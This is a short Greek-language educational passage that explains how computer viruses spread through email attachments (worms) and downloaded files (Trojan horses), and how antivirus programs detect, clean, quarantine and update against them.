Ηλεκτρονικό Ταχυδρομείο: Μέσω των επισυναπτόμενων αρχείων του Ηλεκτρονικού ταχυδρομείου μπορεί να μεταδοθεί κάποιος ιός. Το ηλεκτρονικό ταχυδρομείο συνήθως προσβάλλεται από «Σκουλήκια» («Worms»).
Παγκόσμιος Πληροφοριακός Ιστός: Όταν «κατεβάζετε»
(Download) αρχεία από το Διαδίκτυο κάποιο απ’ αυτά μπορεί να περιέχει ιό. Το σύνηθες εδώ είναι οι “Δούρειοι Ίπποι” (“Trojan Horses”).
Τα αρχεία που περιέχουν έναν ιό, είναι είτε εκτελέσιμα αρχεία (αρχεία εφαρμογών) είτε αρχεία κειμένου και λογιστικών φύλλων τα οποία περιέχουν μακροεντολές.

Αντιμετώπιση

Για την αντιμετώπιση των ιών αναπτύχθηκαν εφαρμογές «Αντιβίωσης» (antivirus). Οι εφαρμογές αυτές παρακολουθούν όλες τις διαδικασίες, που πραγματοποιούνται στο υπολογιστικό σύστημα, με στόχο να ανιχνεύσουν οποιαδήποτε ενέργεια μπορεί να γίνει από κάποιον ιό. Ο έλεγχός τους ξεκινά από τη μνήμη, τις εφαρμογές που εκτελούνται στον υπολογιστή, για να καταλήξει στην πραγματοποίηση ελέγχου στα δεδομένα που μετακινούνται από και προς το υπολογιστικό σύστημα.
Η λειτουργία των προγραμμάτων antivirus μπορεί να περιγραφεί ως εξής : ανιχνεύουν τον ιό και δίνουν στο χρήστη μια σειρά από δυνατότητες: να καθαρίσει τα "μολυσμένα" αρχεία, να τα σβήσει, ή να τα θέσει σε καραντίνα. Ελέγχουν κάθε νέο αρχείο που προσπαθεί ο χρήστης να περάσει στον υπολογιστή του (από δισκέτα, CDROM, e- mail, τοπικό δίκτυο κλπ) και ακόμα προσφέρουν τη δυνατότητα ενημέρωσής τους (Update) μέσω του Διαδικτύου, ώστε έτσι να αναβαθμιστούν και να αντιμετωπίζουν τους νέους ιούς που εμφανίζονται.